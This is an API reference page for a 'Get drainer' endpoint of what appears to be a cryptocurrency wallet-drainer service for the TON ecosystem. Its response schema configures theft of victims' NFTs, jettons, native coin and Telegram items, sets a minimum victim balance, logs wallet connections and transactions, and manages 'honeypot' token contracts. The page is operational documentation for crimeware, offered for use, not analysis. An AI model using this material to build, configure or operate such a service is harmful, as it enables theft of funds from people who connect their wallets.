Get drainer
GET
/bridge/v2/drainers/{id}Authorizations
Parameters
Path Parameters
id*
Typestring
RequiredQuery Parameters
byName
If true, search by name instead of ID
Typeboolean
Responses
Returns the details of a specific drainer
JSON
{
"name": "string",
"routerName": "string",
"enableDonor": true,
"jettonMessage": "string",
"teleitemsMode": 0,
"teleitemsPriceMultiplier": 0,
"teleitemsMaxPriceMultiplier": 0,
"fragmentMode": "string",
"visitLogs": true,
"walletConnectLogs": true,
"txSuccessLogs": true,
"txCancelLogs": true,
"drainNFT": true,
"drainJettons": true,
"drainNative": true,
"drainTeleitems": true,
"minBalanceUSD": 0,
"manifest": "string",
"fragmentPhoneMinPrice": 0,
"fragmentUsernameMinPrice": 0,
"id": "string",
"honeypots": [
{
"amount": 0,
"honeypot": {
"honeypotAddress": "string",
"isDeployed": true,
"tokenSymbol": "string"
}
}
]
}